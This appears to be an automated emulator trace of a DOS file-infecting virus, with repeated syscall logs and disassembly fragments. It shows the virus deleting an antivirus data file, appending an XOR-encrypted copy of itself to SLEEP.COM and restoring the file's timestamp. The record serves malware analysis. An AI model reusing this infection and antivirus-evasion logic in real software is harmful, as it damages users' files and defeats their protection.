2018-12-25T11:55:27.56836162Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.579166229Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.58482244Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.591346441Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.597028413Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.602803568Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:27.614160478Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:27.632175583Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:27.653469963Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:27.677182787Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:27.67876634Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:27.681386968Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-25T11:55:27.68425246Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:27.690889809Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:27.699727604Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:27.705039186Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:27.706457263Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:27.713175498Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:27.714931781Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:27.722949592Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:27.727859651Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.730790945Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.734453851Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.744346641Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.750836167Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.767371997Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.768858148Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.77279149Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.776186231Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.779503469Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.788405295Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.792482205Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.794186961Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.7998249Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.801721843Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.806671565Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.809852891Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.812610013Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.819122336Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.8234402Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.827888096Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.830008743Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.832403206Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.834928711Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.838320863Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.846402656Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.849350868Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.85157618Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.85865994Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.860457639Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.876884509Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.881431386Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.884541896Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.905579156Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.912573581Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.919485693Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.922395386Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.925208537Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.927694107Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.931866288Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.940410415Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.944179852Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.946625483Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.953689416Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.955445438Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.964117771Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.969317022Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.972305629Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.982279529Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.990952311Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.997256081Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.998607751Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.002044396Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.004425092Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.007575764Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.016679551Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.019304645Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.020756356Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.028296389Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.030228152Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.037750988Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.043850796Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.046450237Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.056021068Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.063635711Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.069816697Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.07121187Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.074275142Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.076946469Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.084947365Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.093895106Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.096501698Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.09779176Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.105010656Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.106465376Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.114105088Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.119413206Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.12201483Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.131639726Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.139152086Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.146851092Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.148520326Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.151926606Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.154689232Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.157817428Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.166036002Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.169822231Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.171443821Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.178104692Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.180287605Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.188157922Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.193025898Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.196598455Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.206413252Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.21381788Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.22145384Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.223239007Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.230829746Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.236769752Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.239426884Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:28.243741646Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:28.247939069Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:28.258056918Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:28.260067698Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
0x12b0a: ja 0x12b2e
0x12b0c: mov ax, 0xd
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]
0x12b15: cld
0x12b16: lodsb al, byte ptr [si]
0x12b17: or al, al
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe
0x12b1d: xor bh, bh
0x12b1f: mov bl, 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15
0x12b25: xor ax, ax
0x12b27: int 0x16
0x12b29: mov ax, 3
0x12b2c: int 0x10
0x12b2e: push ax
0x12b2f: push bp
2018-12-25T11:55:28.263257655Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:28.623793254Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:28.626577684Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:28.630198153Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:28.637005909Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:28.643540372Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.65087437Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.663317417Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.67600713Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.687614575Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.694065438Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.701094276Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:28.709415395Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:28.72625309Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:28.733670505Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:28.74134505Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:28.743034787Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:28.745760833Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-25T11:55:28.748600542Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:28.752902215Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:28.762894194Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:28.765894867Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:28.768292362Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:28.775946333Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:28.778093276Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:28.788090336Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:28.793647139Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.796982461Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.80141557Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.812728074Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.821048308Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.828840426Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.830013569Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.83177124Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.833865995Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.835910377Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.845974621Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.849946205Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.851620953Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.858921449Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.860481968Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.869326621Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.874580035Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.877550249Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.888945214Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.896270191Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.903175307Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.90529589Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.90793891Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.910185145Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.914021455Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.922739899Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.925599621Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.927597658Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.934966868Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.93651654Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.945646046Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.95161935Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.954465111Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.965569975Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.972809148Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.979841981Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.98133787Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.9845966Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.987020953Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.990157063Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.999287925Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.001995338Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.003244203Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.011712438Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.013284934Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.022107899Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.027706809Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.030448046Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.041249963Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.049294725Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.056543942Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.058106669Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.061465145Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.063770652Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.067372945Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.078390365Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.081565916Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.083135225Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.091303217Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.093000739Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.101681827Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.106834256Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.109777817Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.119534318Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.126598588Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.134454285Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.136124015Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.139017013Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.143256393Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.152368034Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.161078033Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.1643547Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.166302318Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.173588132Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.17578969Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.184798907Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.190140128Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.193712337Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.205051543Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.212479727Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.219700439Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.221586694Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.224317238Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.226889229Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.230425774Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.239100723Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.241880382Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.244144763Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.251451699Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.253135346Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.262462605Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.268037921Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.271950648Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.283662965Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.291075393Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.298152863Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.300274232Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.308061902Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.313216438Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.316348164Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:29.320837084Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:29.329199233Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:29.342114137Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:29.344001879Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
0x12b0a: ja 0x12b2e
0x12b0c: mov ax, 0xd
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]
0x12b15: cld
0x12b16: lodsb al, byte ptr [si]
0x12b17: or al, al
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe
0x12b1d: xor bh, bh
0x12b1f: mov bl, 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15
0x12b25: xor ax, ax
0x12b27: int 0x16
0x12b29: mov ax, 3
0x12b2c: int 0x10
0x12b2e: push ax
0x12b2f: push bp
2018-12-25T11:55:29.346237628Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:29.957750698Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:29.959381685Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:29.962630998Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:29.969047592Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:29.977858255Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:29.989629969Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:29.995603829Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:30.000900241Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:30.005236186Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:30.008948751Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:30.015844293Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:30.028579058Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:30.048043595Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:30.061209847Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:30.07015236Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:30.071826761Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:30.074602001Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-25T11:55:30.077917253Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:30.081110891Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:30.090623675Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:30.094293564Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:30.09622408Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:30.103925801Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:30.1060411Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:30.116039248Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:30.122378035Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.125610384Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.129474927Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.140446083Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.14787173Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.15264666Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.153867933Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.155676917Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.159795699Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.163243256Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.172104625Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.176315533Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.17799999Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.185410315Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.188022412Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.197755347Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.202835082Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.206098841Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.21641346Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.224072583Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.2316031Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.234222604Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.237296599Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.240034411Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.244275523Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.253582547Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.256608556Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.258927896Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.266311956Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.267990545Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.276858823Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.282762052Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.286117063Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.297570365Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.306136391Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.314344986Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.316329963Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.321204346Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.324919639Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.328906604Z 64 PC: 12c61 | Write file or device (See above)
